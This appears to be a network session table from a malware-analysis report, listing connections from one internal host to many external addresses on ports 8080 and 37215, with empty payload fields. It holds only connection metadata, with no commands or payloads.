                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30007192.168.2.2333344195.194.155.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30008192.168.2.235842661.228.62.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30009192.168.2.2347540171.87.61.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30010192.168.2.2336854156.85.51.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30011192.168.2.2336324128.238.36.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30012192.168.2.2345220180.229.89.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30013192.168.2.2342366173.222.86.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30014192.168.2.234093092.74.194.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30015192.168.2.234132434.137.179.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30016192.168.2.2340578192.128.112.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30017192.168.2.233558819.22.217.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30018192.168.2.2340856128.40.226.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30019192.168.2.2354230197.30.90.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30020192.168.2.233869487.1.174.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30021192.168.2.2348898161.0.216.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30022192.168.2.235209474.91.149.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30023192.168.2.2342086134.120.219.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30024192.168.2.235823041.188.7.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30025192.168.2.233735237.106.230.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30026192.168.2.235137086.173.243.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30027192.168.2.2353238101.150.79.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30028192.168.2.2338034141.178.115.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30029192.168.2.2338574189.205.53.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30030192.168.2.233811257.206.130.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30031192.168.2.234854875.173.245.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30032192.168.2.2357074159.226.182.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30033192.168.2.235034078.88.56.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30034192.168.2.2353564171.240.206.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30035192.168.2.234101071.236.130.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30036192.168.2.2352614210.77.174.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30037192.168.2.234708841.200.193.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30038192.168.2.2343010221.139.183.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30039192.168.2.234538219.110.54.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30040192.168.2.23581809.235.224.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30041192.168.2.2335230197.128.111.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30042192.168.2.2346318176.86.81.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30043192.168.2.2336212201.178.60.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30044192.168.2.2334640163.0.15.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30045192.168.2.234338459.18.139.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30046192.168.2.2356084207.45.139.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30047192.168.2.234553686.80.197.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30048192.168.2.2334108201.15.118.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30049192.168.2.2334408124.143.223.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30050192.168.2.2333280188.170.172.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30051192.168.2.233278046.67.75.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30052192.168.2.2345334165.157.3.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30053192.168.2.2355908167.4.185.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30054192.168.2.2345004173.155.55.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30055192.168.2.234048450.94.26.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30056192.168.2.233453091.108.73.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30057192.168.2.233349895.239.202.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30058192.168.2.2338856133.57.163.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30059192.168.2.235289232.204.62.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30060192.168.2.2332922157.17.0.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30061192.168.2.2341674143.175.46.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30062192.168.2.23406505.227.82.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30063192.168.2.2351030104.159.104.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30064192.168.2.234590074.198.86.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30065192.168.2.2334786199.246.80.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30066192.168.2.235412639.92.129.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30067192.168.2.234714841.123.175.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30068192.168.2.2336284197.64.45.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30069192.168.2.233623441.18.146.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30070192.168.2.236067041.246.89.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30071192.168.2.235010641.179.46.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30072192.168.2.235971641.188.230.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30073192.168.2.2335244197.53.213.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30074192.168.2.2342582157.179.151.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30075192.168.2.2359782122.162.217.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30076192.168.2.235149841.220.216.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30077192.168.2.233778641.6.9.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30078192.168.2.2352520157.30.130.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30079192.168.2.2347592157.3.174.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30080192.168.2.2356238197.192.195.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30081192.168.2.2335198135.65.124.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30082192.168.2.2354280197.135.78.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30083192.168.2.2360892197.23.240.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30084192.168.2.2344694190.225.177.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30085192.168.2.2359802197.142.72.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30086192.168.2.2345364157.177.158.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30087192.168.2.2343738157.92.142.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30088192.168.2.2350590197.125.250.13437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30089192.168.2.235065441.163.198.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30090192.168.2.2341722197.39.23.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30091192.168.2.234427041.164.36.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30092192.168.2.2360752157.77.46.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30093192.168.2.2340686164.76.211.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30094192.168.2.233541641.5.41.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30095192.168.2.2338380197.63.162.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30096192.168.2.234032241.138.138.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30097192.168.2.2344896157.72.41.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30098192.168.2.2355546111.166.183.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30099192.168.2.23427441.145.203.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30100192.168.2.2352540157.203.78.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30101192.168.2.2333674117.175.103.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30102192.168.2.2339366157.102.193.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30103192.168.2.2338146157.32.83.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30104192.168.2.2337092197.143.55.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30105192.168.2.2350524157.219.127.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30106192.168.2.2352302197.51.77.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30107192.168.2.234491641.217.165.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30108192.168.2.2340874141.62.51.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30109192.168.2.234660650.242.75.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30110192.168.2.2335240126.16.64.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30111192.168.2.2360440197.144.197.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30112192.168.2.2344722166.200.9.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30113192.168.2.2352778157.219.234.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30114192.168.2.234647441.155.228.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30115192.168.2.2350554197.88.26.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30116192.168.2.2354654157.160.89.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30117192.168.2.2340804157.4.217.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30118192.168.2.2353838112.28.193.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30119192.168.2.2333796157.145.106.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30120192.168.2.234012641.168.96.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30121192.168.2.2335672197.86.11.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30122192.168.2.2341914197.109.238.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30123192.168.2.2356218211.238.76.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30124192.168.2.2343622157.132.139.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30125192.168.2.2347926197.55.108.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30126192.168.2.235121041.144.38.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30127192.168.2.234347262.126.122.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30128192.168.2.2341158183.250.220.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30129192.168.2.2359976157.31.39.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30130192.168.2.2355004157.227.119.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30131192.168.2.2357164157.125.90.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30132192.168.2.2355546157.49.112.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30133192.168.2.233835441.113.93.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30134192.168.2.2351312197.32.245.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30135192.168.2.234801441.207.67.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30136192.168.2.235748441.207.18.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30137192.168.2.2355386197.197.172.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30138192.168.2.235556041.196.194.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30139192.168.2.234479641.114.140.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30140192.168.2.233418241.235.57.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30141192.168.2.235709453.237.39.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30142192.168.2.2333728197.10.147.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30143192.168.2.2335680157.169.50.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30144192.168.2.2333884197.203.198.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30145192.168.2.2360134157.66.221.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30146192.168.2.235184414.33.126.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30147192.168.2.2360418157.202.97.18337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30148192.168.2.2360164157.19.246.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30149192.168.2.2358644157.104.40.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30150192.168.2.2348492167.251.22.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30151192.168.2.2356726157.108.249.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30152192.168.2.2341732197.64.149.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30153192.168.2.233324068.4.93.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30154192.168.2.235667641.141.87.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30155192.168.2.233776641.63.157.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30156192.168.2.2349140197.231.96.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30157192.168.2.2335138132.180.42.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30158192.168.2.236077641.253.93.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30159192.168.2.235537695.7.224.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30160192.168.2.2355796157.58.207.23537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30161192.168.2.2360196197.136.22.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30162192.168.2.2355008157.100.147.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30163192.168.2.234139434.39.249.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30164192.168.2.2340690197.12.224.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30165192.168.2.2340550165.72.84.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30166192.168.2.2334234157.242.152.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30167192.168.2.2351528157.76.242.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30168192.168.2.2335954197.161.84.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30169192.168.2.2350750157.89.85.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30170192.168.2.2334482171.148.107.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30171192.168.2.233754441.104.49.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30172192.168.2.2332878157.205.59.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30173192.168.2.234472841.99.132.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30174192.168.2.2335974197.26.254.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30175192.168.2.235139441.222.157.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30176192.168.2.234464041.212.156.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30177192.168.2.233903654.182.254.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30178192.168.2.2355352157.63.18.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30179192.168.2.235957241.19.135.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30180192.168.2.233290241.135.141.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30181192.168.2.2336874157.182.153.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30182192.168.2.2333910116.216.174.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30183192.168.2.2345240197.195.133.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30184192.168.2.2338740197.239.101.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30185192.168.2.2342584157.69.175.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30186192.168.2.2354808197.90.30.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30187192.168.2.234881441.197.137.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30188192.168.2.2358232197.24.32.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30189192.168.2.2349932197.155.243.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30190192.168.2.2357772197.45.110.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30191192.168.2.2339572197.88.22.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30192192.168.2.233518441.232.175.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30193192.168.2.2337760157.24.215.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30194192.168.2.2346526168.25.16.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30195192.168.2.2341766157.142.5.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30196192.168.2.233452041.204.136.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30197192.168.2.235201041.57.116.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30198192.168.2.233367438.208.132.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30199192.168.2.233769241.21.17.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30200192.168.2.2340256197.5.168.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30201192.168.2.2335062197.166.40.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30202192.168.2.2357454196.101.235.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30203192.168.2.2339502197.39.55.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30204192.168.2.236032041.19.129.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30205192.168.2.233736841.214.27.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30206192.168.2.235680241.220.53.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30207192.168.2.2348902218.13.1.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30208192.168.2.235878044.221.235.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30209192.168.2.2353594197.43.133.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30210192.168.2.2344082157.75.84.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30211192.168.2.233601874.9.133.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30212192.168.2.233315441.102.63.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30213192.168.2.2358720157.18.67.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30214192.168.2.2334748157.119.98.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30215192.168.2.234718241.242.227.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30216192.168.2.2343366157.33.146.1237215
